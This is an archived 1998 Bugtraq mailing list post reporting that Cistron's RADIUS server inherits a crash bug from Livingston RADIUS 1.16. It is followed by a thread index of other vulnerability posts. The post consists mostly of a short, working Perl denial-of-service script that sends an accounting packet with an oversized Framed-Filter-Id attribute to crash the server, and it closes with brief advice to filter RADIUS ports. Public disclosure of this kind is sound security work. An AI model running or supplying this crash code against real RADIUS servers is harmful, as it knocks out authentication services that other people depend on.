Bugtraq mailing list archives
code to crash cistron's radius
From: hamdi.tounsi () ati tn (Hamdi Tounsi)
Date: Tue, 21 Apr 1998 09:59:08 -0100
--35904.37635.2092 Content-Type: text/plain cistron's radius is also vulnerable to the radius crasher i posted here last week, since it is derived from livingston's radius 1.16. the code is simpler : #!/usr/bin/perl use Authen::RadiusAcct; $r = new Authen::RadiusAcct(Host => 'radiushost:1646', Secret => 'any_secret'); $r->load_dictionary; $r->add_attributes( {Name => 'User-Name', Value => 'dummy'}, {Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')}, ); $r->send_packet(4); } * remember to filter access to your radius servers ports to protect them. --35904.37635.2092--
Current thread:
- Re: APC UPS PowerChute PLUS exploit..., (continued)
- Re: APC UPS PowerChute PLUS exploit... Rick Perry (Apr 13)
- Re: APC UPS PowerChute PLUS exploit... Pascal Gienger (Apr 14)
- Re: APC UPS PowerChute PLUS exploit... Scott Stone (Apr 14)
- New possible exploit for 2.0.33 (kfree_skb error) Paul (Apr 15)
- Re: New possible exploit for 2.0.33 (kfree_skb error) Alan Cox (Apr 15)
- Linux 2.0.33 vulnerability: fragment patterns Alan Cox (Apr 16)
- Linux 2.0.33 vulnerability: oversized packets Michal Zalewski (Apr 17)
- Linux 2.0.34pre10: Summary of fixed vulnerabilities Alan Cox (Apr 20)
- Re: Linux 2.0.33 vulnerability: oversized packets Jon Lewis (Apr 20)
- Re: Linux 2.0.33 vulnerability: oversized packets Krzysztof G. Baranowski (Apr 21)
- code to crash cistron's radius Hamdi Tounsi (Apr 21)
- nestea v2. The program that DoS's 2.0.33s The Tree of Life (Apr 18)
- xdm problems Thomas Roessler (Apr 16)
- Re: xdm problems Matthieu Herrb (Apr 20)
- SECURITY: procps 1.2.7 fixes security hole Aleph One (Apr 20)